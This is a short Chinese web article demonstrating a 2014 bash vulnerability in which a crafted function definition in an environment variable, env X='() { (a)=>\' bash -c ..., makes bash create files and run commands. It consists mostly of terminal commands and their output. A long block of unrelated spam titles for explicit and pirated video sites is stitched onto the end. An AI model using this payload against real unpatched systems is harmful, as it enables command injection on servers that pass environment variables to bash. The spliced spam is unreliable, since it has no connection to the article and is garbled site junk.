《電子技術應用》
您所在的位置:首頁 > 嵌入式技術 > 設計應用 > 一個linux下的bash安全漏洞
一個linux下的bash安全漏洞
摘要:
關鍵詞: bash 09 2014 2713 david davidcchen
Abstract:
Key words :

 1. 通過設置一個特殊的環境變量的env,能間接地查到到linux命令的屬性,如下:

  [2014-09-27 13:00:54 david@davidcchen ~]$ ls -l date

  ls: cannot access date: No such file or directory

  [2014-09-27 13:01:13 david@davidcchen ~]$ env -i X='() { (a)=>\' bash -c 'date'

  bash: X: line 1: syntax error near unexpected token `='

  bash: X: line 1: `'

  bash: error importing function definition for `X'

  [2014-09-27 13:01:21 david@davidcchen ~]$ ls -l date

  -rw-rw-r--. 1 david david 0 Sep 27 13:01 date

  [2014-09-27 13:01:27 david@davidcchen ~]$

  2. 一次運行環境變量。

  [2014-09-27 13:01:27 david@davidcchen ~]$ zsh --version

  zsh 4.3.10 (x86_64-redhat-linux-gnu)

  [2014-09-27 13:03:24 david@davidcchen ~]$ bash --version

  GNU bash, version 4.1.2(1)-release (x86_64-redhat-linux-gnu)

  Copyright (C) 2009 Free Software Foundation, Inc.

  License GPLv3+: GNU GPL version 3 or later

  This is free software; you are free to change and redistribute it.

  There is NO WARRANTY, to the extent permitted by law.

  [2014-09-27 13:03:31 david@davidcchen ~]$ env X='() { (a)=>\' bash -c "echo date"; cat echo; rm echo

  bash: X: line 1: syntax error near unexpected token `='

  bash: X: line 1: `'

  bash: error importing function definition for `X'

  Sat Sep 27 13:03:52 CST 2014

  ---------->成功運行date命令

此內容為AET網站原創,未經授權禁止轉載。
主站蜘蛛池模板: 久久久精品人妻无码专区不卡| 成人免费视频一区二区三区| 国产偷窥熟女精品视频| 国产国产精品人在线观看| 久久夜色精品国产噜噜麻豆| 色yeye香蕉凹凸视频在线观看| 好吊视频一区二区三区| 亚洲日韩AV一区二区三区四区 | 精品国产香港三级| 天天综合天天干| 亚洲成a人片在线观看精品| 99久久国产亚洲综合精品| 欧美交换性一区二区三区| 国产免费av片在线观看| 一本精品99久久精品77| 欧美成人精品第一区二区三区 | 健身私教弄了我好几次啊| 2021乱理片宅它网| 新梅金瓶之爱奴1国语在线观看| 人善交另类欧美重口另类| 日本wwwxxxxx| 强开小婷嫩苞又嫩又紧韩国视频| 亚洲熟妇丰满xxxxx| 麻豆一区区三三四区产品麻豆| 广西美女一级毛片| 亚洲免费观看视频| 翁与小莹浴室欢爱51章| 国模无码一区二区三区| 久久综合九色综合网站| 精品爆乳一区二区三区无码av| 国产精品无码无卡无需播放器| 久久91精品国产91| 国产1000部成人免费视频| 中文字幕精品无码亚洲字| 欧美高清色视频在线播放| 天天综合网天天综合色| 乱子伦xxxx| 男人扒开女人的腿做爽爽视频| 国产成人精品免费久久久久| jealousvue熟睡入侵中| 爱情岛永久地址www成人|